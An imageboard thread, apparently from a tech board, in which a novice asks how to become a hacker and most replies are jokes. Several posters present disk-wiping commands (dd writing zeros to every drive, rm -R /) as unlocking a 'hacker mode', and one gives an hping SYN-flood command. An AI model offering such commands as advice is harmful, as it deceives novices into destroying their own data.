How do I become a h4xx0r?

How do I become a h4xx0r?

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Like this.

Download Linux install CD. Burn to disc

Boot disc, open terminal, access hidden hacker mode by typing

sudo dd if=/dev/zero of=/dev/sd* bs=8M

Reboot. Your computer is now in hacker mode

Hack a gibson

the shell expansion wouldnt work

>sudo dd if=/dev/zero of=/dev/sd* bs=8M

Listen to Lazerhawk.

That's literally it.

That just makes you a rockstar, dude.

To be a hacker you have to get a computer with flip switch input.

Zeta 256 or gtfo

You learn about computers DUHH

Go to
They have some courses you can follow

sudo rm -R /
it's way faster to do it this way user

sign up for some professional programming courses. main Sup Forums approved are 'kode with karlie'

He's right, that script is all kinds of newb sauce.

But to unlock the full potential you have to make sure every drive gets unlocked.

Here's the right one:

for i in {a..z}; do sudo dd if=/dev/zero of=/dev/sd$i bs=100M count=1; done

Can't believe that other guy thought you'd fall for his dumb shit. It would have just given you teh virus


hping -S -a localhost --flood
there am's H@K5@u4 now

no way, user. That only works on Linux, and a lot of newer distributions put in "anti hacker mode" protection which returns an error:

it is dangerous to operate recursively on /

dd is the only way to go, it makes sure you don't have to mount your drive to unlock all the cool haxxor features


Yeah, but how to do it without learning stuff???

What command to type?

>for i in {a..z}; do sudo dd if=/dev/zero of=/dev/sd$i bs=100M count=1; done

hakR mode haz tutorial 4 nobz

Look you need Linux alright? All these commands just don't work on windows. So start by installing a beginner distro like Ubuntu and trying out these commands. Watch and learn from experience

Don't risk losing your files by installing Linux, just run the hacker mode command direct from a Ubuntu boot disk

heh. you think youve got what it takes to be a hacker? nice try, kid. i bet you cant even turn your macbook on without mommy and daddys help, huh? I bet you don't even have your desktop riced like mine, fucking newfag. just because I take pity on you, and only because I take pity in you, I'm going to tell you how to actually be a hacker. the first thing you have to do is download the torrent browser and start surfing the deep web. be careful down there , you dont know what youre doing and you arent prepared for what you might see. the second thing you have to do, is to join an underground deepweb hacker collective, no lone wolf ever took down a sheep by its self. youre almost there. you should stop using apostrophes or proper punctuation because when youre constantly running and editing javascript scripts and uploading trojan viruses to scrubs harddrives, you dont have time to type like a new fag. if you don't follow that step youre going to be ripped apart in the seep web like a five dollar bill in a sinagog. next you have to install linux and change your display settings to high contrast number 2, nobosy will take you seriously otherwise. finally, and this is the most important, dont ever tell anyone you meet on the clearweb the things you have seen on the other side, we dont need that kind of publicity. if you want actual advice on hacking , you should go to 00101111 01110010 01110010 01100011 01100011 00110101 01110101 01110101 01110101 01100100 01101000 01101000 00110100 01101111 01111010 00110011 01100011 00101110 01101111 01101110 01101001 01101111 01101110 . if you dont know what any of those numbers mean, you dont have what it takes to be a hacker. sorry, but not everyone is cut out for it. thats just the way the game works.



>Fell for the "deep web means l33t" meme
>Thinks using a ascii to binary converter is super l33t
>/rrcc5uuudhh4oz3c.onion is probably goat porn
> didn't even unlock hacker mode

It didn't do anything...

Okay, but we all need to start someware.


learn to computer

First you need to code a GUI in visual basic.
Come back after you've done that.

1. don't be retarded
2. learn social engineering
3. ????
